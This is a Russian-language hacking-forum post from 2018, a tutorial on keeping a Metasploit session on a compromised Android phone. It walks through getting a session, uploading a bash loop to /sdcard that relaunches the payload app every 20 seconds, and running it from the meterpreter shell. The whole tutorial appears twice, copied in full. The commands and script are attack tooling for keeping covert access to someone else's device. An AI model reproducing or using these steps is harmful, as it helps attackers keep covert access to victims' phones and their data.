- 93
- 136
- 27 Фев 2018
Сегодня покажу как закрепиться в системе андроид. Скрипт будет работать до перезагрузки!. Наверняка у всех такое было, когда умирает сессия при пропадании соединения, и нет возможности запустить её снова, и успеть сделать все дела.
Нам необходимо создать полезную нагрузку, создали. Далее запускаем листенер в метасплоите, получили сессию. Приступим.
Теперь нам необходимо узнать в какой мы директории.
Команда pwd
Сейчас нам нужно найти ту директорию, в которую мы сможем загрузить наш скрипт. Так как у нас нету рута, и мы не можем загрузить его в системную директорию.
Для этого нам нужно перейти во внутреннюю память телефона или же на карту памяти.
В моём случае командой.
cd /sdcard/
Сейчас нам требуется отредактировать наш bash скрипт
Код:
#!/bin/bash
while :
do am start --user 0 -a android.intent.action.MAIN -n com.omnttopjcg.wpzfylbays/.MainActivity
sleep 20
done
Строчку com.omnttopjcg.wpzfylbays вы должны заменить на свою. Получили мы её командой pwd
После того как заменили текст, сохраняем наш скрипт, и загружаем командой upload , и указываем директорию к нашему скрипту или же просто перетащим его с нашёго рабочего стола в консоль. Загрузили.
Заходим в shell. Команда
shell
И запускаем наш скрипт.
sh *название вашего скрипта* *
Для того чтобы скрипт сработал, нам необходимо подождать 1 минуту. "Обязательно!" Тут главно не передержать, а иначе всё испортим..
Прошло 2,5, нам необходимо остановить наш скрипт сочетанием клавиш "Ctrl+c". И подтверждаем закрытие Y
Готово. Сессия будет прилетать даже при плохом соединении. Нам нужно лишь снова написать команду exploit. Для того чтобы понять как это работает, необходимо протестировать на своём устройстве.
Нам необходимо создать полезную нагрузку, создали. Далее запускаем листенер в метасплоите, получили сессию. Приступим.
Теперь нам необходимо узнать в какой мы директории.
Команда pwd
Сейчас нам нужно найти ту директорию, в которую мы сможем загрузить наш скрипт. Так как у нас нету рута, и мы не можем загрузить его в системную директорию.
Для этого нам нужно перейти во внутреннюю память телефона или же на карту памяти.
В моём случае командой.
cd /sdcard/
Сейчас нам требуется отредактировать наш bash скрипт
Код:
#!/bin/bash
while :
do am start --user 0 -a android.intent.action.MAIN -n com.omnttopjcg.wpzfylbays/.MainActivity
sleep 20
done
Строчку com.omnttopjcg.wpzfylbays вы должны заменить на свою. Получили мы её командой pwd
После того как заменили текст, сохраняем наш скрипт, и загружаем командой upload , и указываем директорию к нашему скрипту или же просто перетащим его с нашёго рабочего стола в консоль. Загрузили.
Заходим в shell. Команда
shell
И запускаем наш скрипт.
sh *название вашего скрипта* *
Для того чтобы скрипт сработал, нам необходимо подождать 1 минуту. "Обязательно!" Тут главно не передержать, а иначе всё испортим..
Прошло 2,5, нам необходимо остановить наш скрипт сочетанием клавиш "Ctrl+c". И подтверждаем закрытие Y
Готово. Сессия будет прилетать даже при плохом соединении. Нам нужно лишь снова написать команду exploit. Для того чтобы понять как это работает, необходимо протестировать на своём устройстве.
